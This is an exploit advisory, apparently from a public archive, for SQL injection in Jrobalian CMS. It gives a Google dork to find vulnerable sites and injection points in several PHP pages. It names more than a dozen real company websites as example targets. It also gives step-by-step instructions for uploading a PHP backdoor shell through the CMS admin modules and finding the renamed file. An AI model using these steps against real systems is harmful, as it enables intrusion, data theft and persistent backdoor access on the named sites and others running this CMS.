Jrobalian CMS suffers from a remote SQL injection vulnerability.
7505366a61059df42a26ed5ea3178d81c568eee5ce47317e69f6ce889b8d982c
=====================================================
Jrobalian CMS SQL Injection Vulnerability
=====================================================
:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Jrobalian CMS SQL Injection Vulnerability
: # Date : 21 July 2012
: # Author : X-Cisadane
: # Software Link : https://www.jrobalian.com/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection Vulnerability & Upload Shell Vulnerability
: # Tested On : Mozilla Firefox 7.0.1 (Windows)
: # Greetz to : Andry Priatna, X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari
:----------------------------------------------------------------------------------------------------------------------------------------:
DORKS
=====
inurl:i.php?mid=
Proof of Concept
================
1.SQL Injection (With Error Notice & Without Error Notice)
SITE TARGET.com/content/i.php?mid=[SQLi]
OR
SITE TARGET.com/content/i.php?mid=Integer Value&id=[SQLi]
Example :
https://www.daikinaircon.co.id/content/i.php?mid=4&id=41'
https://www.investors-academy.co.id/content/i.php?mid=3&id=7'
https://www.pdpersi.co.id/content/i.php?mid=3&id=112'
https://www.indosuksesfutures.com/content/i.php?mid=3&id=81'
https://www.shop4mattress.com/content/i.php?mid=69'
Others :
SITE TARGET.com/content/news.php?catid=[SQLi]
Example :
https://www.indosuksesfutures.com/content/news.php?catid=1'&?mid=6&id=20
https://www.idijakbar.com/content/news.php?catid=1'
https://www.contohwebsite.com/content/news.php?catid=1'&mid=4&id=24
https://www.quadras.co.id/content/news.php?show=comment&id=11'
https://www.contohwebsite.com/content/pd_events.php?mid=4&id=&catid=1'&show=archive
https://www.daikinaircon.co.id/content/products.php?plid=1&mid=2&id=21'
https://www.daikinaircon.co.id/content/projects.php?mid=3&ptid=13'
https://www.daikinaircon.co.id/content/gallery.php?&mid=13&id=17'
https://www.daikinaircon.co.id/content/downloads.php?&mid=5&id=28'
https://www.daikinaircon.co.id/content/faqs.php?&mid=5&id=29'
https://www.daikinaircon.co.id/content/training.php?&mid=5&id=30'
Explore more your self...
Tested With Havij - Advanced SQL Injection Tool Version 1.15 Free
2.Upload Shell (Must login with admin privilege)
If the force with you (you've successfully cracked the password) 0:) you can login with Admin privilege into CMS.
Admin login page :
SITE TARGET.com/admin/
or
SITE TARGET.com/content/admin/
Example : https://www.shop4mattress.com/admin/
Then Upload Shell from Administrator Modules -> Website Contents -> Newsroom & Articles -> Create NEW Articles.
Insert an ATTACHMENT (your .php Backdoor)
Then check Published to yes, and click SAVE!
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content_file/YOUR PHP BACKDOOR.php'
OR you can upload PHP Shell from Administrator Modules -> Website Contents -> Downloads -> Create New file to Downloads.
Insert Title, Description, Insert your PHP Backdoor (browse)
Then click SAVE!
After that check your PHP Backdoor in this directory -> 'SITE TARGET.com/content/downloads.php'
Then Click Button 'Unduh' (Download), After that your browser will shown a pop-up to download a file, example : file21_ba.php <--- Your PHP Backdoor which automatically renamed by the CMS.
You can access file21_ba.php by following this link 'SITE TARGET.com/downloads/Your Renamed PHP Backdoor.php'
Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!